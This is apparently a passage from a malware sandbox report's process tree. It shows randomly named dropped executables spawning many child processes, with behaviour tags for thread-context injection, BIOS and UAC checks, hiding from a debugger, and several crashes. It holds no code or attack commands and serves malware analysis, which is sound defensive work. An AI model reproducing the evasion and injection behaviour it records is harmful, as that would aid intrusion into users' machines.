- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:25440
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:23300
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:25144
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:24584
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:25144
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:23104
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:23428
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:25684
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:26156
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:26428
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:26052
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:25908
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:25680
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:26476
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:25892
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:23904
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:26772
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:27096
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:27368
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:26736
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:27196
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:27512
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:808
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:27476
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:26992
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:26264
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:25012
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:23376
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:27740
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:27948
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:28140
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:28424
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:27772
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:28032
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:28632
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:8724
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:25936
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:28472
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:28192
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:11968
- - C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    C:\Users\Admin\Documents\pD2LEcglTvJ1L4nFL7ok9ltD.exe
    3⤵
    PID:28880
- C:\Users\Admin\Documents\nR9fDndsaDoNpezRePWDl_or.exe
  "C:\Users\Admin\Documents\nR9fDndsaDoNpezRePWDl_or.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1544
- - C:\Users\Admin\Documents\nR9fDndsaDoNpezRePWDl_or.exe
    "C:\Users\Admin\Documents\nR9fDndsaDoNpezRePWDl_or.exe"
    3⤵
    - Executes dropped EXE
    PID:5092
- C:\Users\Admin\Documents\ra2PtsK52a_xeaXPeEl0kApN.exe
  "C:\Users\Admin\Documents\ra2PtsK52a_xeaXPeEl0kApN.exe"
  2⤵
  - Executes dropped EXE
  PID:2792
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Ou3tPfureT.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Ou3tPfureT.exe"
    3⤵
    PID:6008
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:6724
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6008 -s 248
      4⤵
      Program crash
      PID:3548
- C:\Users\Admin\Documents\XGPRwYq4OsMDhG6fW9rqUvUa.exe
  "C:\Users\Admin\Documents\XGPRwYq4OsMDhG6fW9rqUvUa.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4000
- - C:\Users\Admin\Documents\XGPRwYq4OsMDhG6fW9rqUvUa.exe
    "C:\Users\Admin\Documents\XGPRwYq4OsMDhG6fW9rqUvUa.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:3788
- C:\Users\Admin\Documents\AjQUOH6H7S3wLqtX8AB8l7fR.exe
  "C:\Users\Admin\Documents\AjQUOH6H7S3wLqtX8AB8l7fR.exe"
  2⤵
  - Executes dropped EXE
  PID:4760
- C:\Users\Admin\Documents\jeyEdTLA3C2J5ZFtNHBjZ3wa.exe
  "C:\Users\Admin\Documents\jeyEdTLA3C2J5ZFtNHBjZ3wa.exe"
  2⤵
  PID:5076
- - C:\Program Files (x86)\Company\NewProduct\cutm3.exe
    "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
    3⤵
    PID:5848
- - C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
    3⤵
    PID:4968
- - C:\Program Files (x86)\Company\NewProduct\inst1.exe
    "C:\Program Files (x86)\Company\NewProduct\inst1.exe"
    3⤵
    PID:4212
- C:\Users\Admin\Documents\lunvim20VcoxOctqlyJJ43Ao.exe
  "C:\Users\Admin\Documents\lunvim20VcoxOctqlyJJ43Ao.exe"
  2⤵
  - Executes dropped EXE
  PID:4976
- C:\Users\Admin\Documents\dPu5Epg3rEzRvbeQXIfAz6YC.exe
  "C:\Users\Admin\Documents\dPu5Epg3rEzRvbeQXIfAz6YC.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:4908
- C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
  "C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4792
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:5636
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:5552
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:5652
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:5944
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:6404
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 24
      4⤵
      Program crash
      PID:6756
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:6732
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:6148
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:5772
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:2432
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:1380
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1380 -s 24
      4⤵
      Program crash
      PID:7548
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:7460
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:7908
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:6636
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:4332
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:7904
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:8272
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:8824
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:7256
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:8948
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:4176
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:9192
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:8800
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:5340
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:7944
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:8504
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:9492
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:9908
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:9276
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:9684
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:10160
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:9780
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:7232
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:4660
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:5572
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:9228
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:5528
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:8376
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:9668
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:6880
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:10528
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:10872
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:8660
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:10640
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:11204
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:7192
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:9736
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:10480
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:1188
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:4072
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:10792
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:7176
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:11512
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:11864
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:12176
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:11720
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:11480
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:2332
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:6460
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:10536
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:10152
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:9568
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:12080
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:12116
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:10896
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 10896 -s 24
      4⤵
      Program crash
      PID:5908
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:6812
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:12540
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 12540 -s 24
      4⤵
      Program crash
      PID:12956
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:12936
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:8980
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:12296
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:11052
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:12644
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:3556
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:12588
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:7132
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:12432
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 12432 -s 160
      4⤵
      Program crash
      PID:8172
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:13232
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:8880
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:13532
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:13864
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:14236
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:13364
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:13980
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:14048
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:13436
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:13828
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:13044
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:13436
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:4560
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:6900
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
